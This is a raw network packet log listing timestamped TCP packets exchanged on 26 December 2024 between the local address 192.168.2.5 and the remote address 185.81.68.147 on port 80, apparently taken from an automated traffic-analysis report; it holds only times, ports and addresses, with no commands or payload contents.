                                                                                      Dec 26, 2024 12:05:15.878752947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.878752947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.879585981 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.879674911 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.879697084 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.879807949 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.880620956 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.880673885 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.880695105 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.880740881 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.881818056 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.881867886 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.881879091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.882081032 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.882740974 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.882795095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.882874012 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.882947922 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.883774996 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.883826971 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.883861065 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.883903980 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.884767056 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.884819031 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.884859085 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.884902954 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.885786057 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.885833979 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.885837078 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:15.886753082 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:15.886827946 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.050172091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.050260067 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.050342083 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.050617933 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.050662994 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.050802946 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.050847054 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.051697016 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.052011967 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.052047014 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.052057028 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.052089930 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.053024054 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.053066015 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.053121090 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.053158045 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.054064035 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.054086924 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.054105043 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.054121971 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.055075884 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.055116892 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.055166006 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.055207014 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.056087971 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.056212902 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.056262970 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.057322979 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.057384014 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.057435036 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.057473898 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.058176041 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.058219910 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.058268070 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.058310032 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.059185982 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.059228897 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.059282064 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.059340000 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.060215950 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.060305119 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.060353994 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.061184883 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.061230898 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.061362028 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.061400890 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.062252045 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.062295914 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.062453985 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.062495947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.063323021 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.063365936 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.063391924 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.063436985 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.064285994 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.064403057 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.064448118 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.065675020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.065743923 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.065773010 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.065814972 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.066313982 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.066374063 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.066483021 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.066528082 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.067361116 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.067399979 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.067446947 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.067485094 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.068361998 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.068464041 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.068504095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.069405079 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.069448948 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.069468021 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.069494009 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.070445061 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.070492029 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.070550919 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.070589066 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.071511984 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.071554899 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.071590900 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.071631908 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.072501898 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.072545052 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.072576046 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.072613955 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.073513031 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.073556900 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.073575020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.073611021 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.074529886 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.074585915 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.074661970 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.074700117 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.075568914 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.075655937 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.075696945 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.076565981 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.076605082 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.076694965 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.076746941 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.077828884 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.077862024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.077883005 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.077907085 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.078773022 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.078785896 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.078840971 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.079644918 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.079869986 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.079935074 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.080699921 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.080739975 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.080777884 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.080820084 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.081692934 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.081733942 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.081773996 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.081808090 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.082727909 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.082804918 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.082871914 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.083204031 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.083724976 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.083841085 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.083884001 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.084883928 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.084927082 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.085093021 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.085138083 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.085815907 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.085855007 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.085916996 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.085966110 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.086826086 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.086865902 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.086916924 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.086952925 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.087913036 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.087979078 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.088044882 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.088875055 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.088912964 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.088967085 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.089005947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.089909077 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.089951038 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.090004921 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.090044022 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.090939999 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.090982914 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.091003895 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.091039896 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.091939926 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.092076063 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.092123032 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.092961073 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.093004942 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.093121052 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.093163967 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.094027042 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.094082117 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.094244957 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.094284058 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.094995975 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.095043898 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.095098019 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.095141888 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.096046925 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.096189976 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.096237898 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.097090006 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.097170115 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.097212076 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.097254038 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.098073006 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.098128080 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.098167896 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.098206997 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.099107027 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.099152088 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.099196911 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.099241018 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.100148916 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.100256920 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.100310087 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.101182938 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.101236105 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.101274014 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.101313114 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.102195024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.102233887 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.102291107 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.102327108 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.103223085 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.103261948 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.103285074 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.103326082 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.262614965 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.262639046 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.262682915 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.262736082 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.262784958 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.262867928 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.262911081 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.262958050 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.263847113 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.263900995 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.263926983 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.263973951 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.264949083 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.264997005 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.265038967 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.265084982 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.266047955 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.266103029 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.266145945 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.267041922 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.267091036 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.267096996 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.267137051 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.268047094 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.268098116 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.268428087 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.268474102 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.268942118 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.268990040 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.269078970 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.269124985 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.269987106 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.270030022 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.270067930 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.270121098 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.270981073 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.271086931 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.271122932 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.272123098 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.272172928 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.272192001 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.272468090 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.273044109 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.273094893 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.273132086 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.273170948 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.274070024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.274122000 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.274169922 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.275100946 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.275180101 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.275300980 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.275372982 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.276144981 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.276196003 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.276226997 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.276272058 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.276566029 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.396270037 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.697885990 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.817560911 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:16.817642927 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.817986012 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:16.937787056 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:17.081388950 CET8049715185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:17.081481934 CET4971580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:17.081660032 CET8049715185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:17.081716061 CET4971580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:17.084037066 CET4971580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:17.203790903 CET8049715185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:17.290071011 CET4971780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:17.409856081 CET8049717185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:17.411413908 CET4971780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:17.433113098 CET4971780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:17.552659988 CET8049717185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248161077 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248187065 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248199940 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248248100 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248264074 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248270035 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:18.248270035 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:18.248305082 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:18.248311043 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248322964 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248333931 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248349905 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:18.248369932 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:18.248639107 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248651981 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.248775005 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:18.369504929 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.369524002 CET8049716185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:18.369610071 CET4971680192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:18.372200966 CET8049716185.81.68.147192.168.2.5
